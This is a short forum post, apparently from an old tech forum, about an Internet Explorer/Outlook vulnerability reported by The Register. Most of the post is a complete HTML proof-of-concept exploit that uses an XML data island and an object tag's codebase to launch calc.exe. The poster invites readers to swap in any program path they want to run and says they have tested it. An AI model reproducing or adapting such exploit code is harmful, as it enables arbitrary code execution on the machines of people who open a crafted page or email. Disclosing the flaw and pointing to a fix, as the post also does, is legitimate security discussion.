Another IE/Outlook Hole

Status
Not open for further replies.

lokem

Posts: 653   +0
The Register has just posted that IE/Outlook can run arbitrary commands with a simple bit of HTML.

Read the rest here:

http://www.theregister.co.uk/content/4/24274.html

The article also has a simple fix for this problem.

Here's the simple script:

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>


Change c:/windows/system32/calc.exe to the appropriate directory and filename you want to run. I've tested this myself, and it's REALLY scary.
 
Status
Not open for further replies.
Back